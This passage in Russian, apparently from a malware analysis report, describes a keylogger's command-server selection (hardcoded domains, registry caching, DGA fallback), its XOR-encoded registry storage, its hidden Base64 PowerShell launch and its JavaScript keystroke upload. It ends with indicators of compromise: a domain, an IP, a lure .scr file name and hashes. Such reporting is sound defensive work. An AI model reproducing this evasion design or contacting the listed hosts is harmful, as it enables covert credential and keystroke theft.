Управляющая инфраструктура выбирается гибридно: сначала агент перебирает жестко заданный список стартовых доменов и кэширует «рабочий» домен в реестре, а при недоступности кэша переходит к генерации доменов через DGA-механизм и подбору пула валидных C2-серверов. Кейлоггер хранится в реестре в XOR-кодировке и запускается «тихим» PowerShell-процессом в скрытом режиме с передачей полезного фрагмента в Base64 через powershell.exe, после чего JavaScript-код выгружает собранные нажатия на сервер управления.
| Домены | vektor-k[.]cfd |
| IP-адреса | 91.92.240[.]129 |
| Имена файлов | Документы от 03.12.2025.scr |
| Контрольные суммы | 4654d6573891a3ac533b3df11e76fb3c 61b417786b39f3a49b398fbf5a214480 58a5c25a1df158bf656bcfb3b205d837 |


















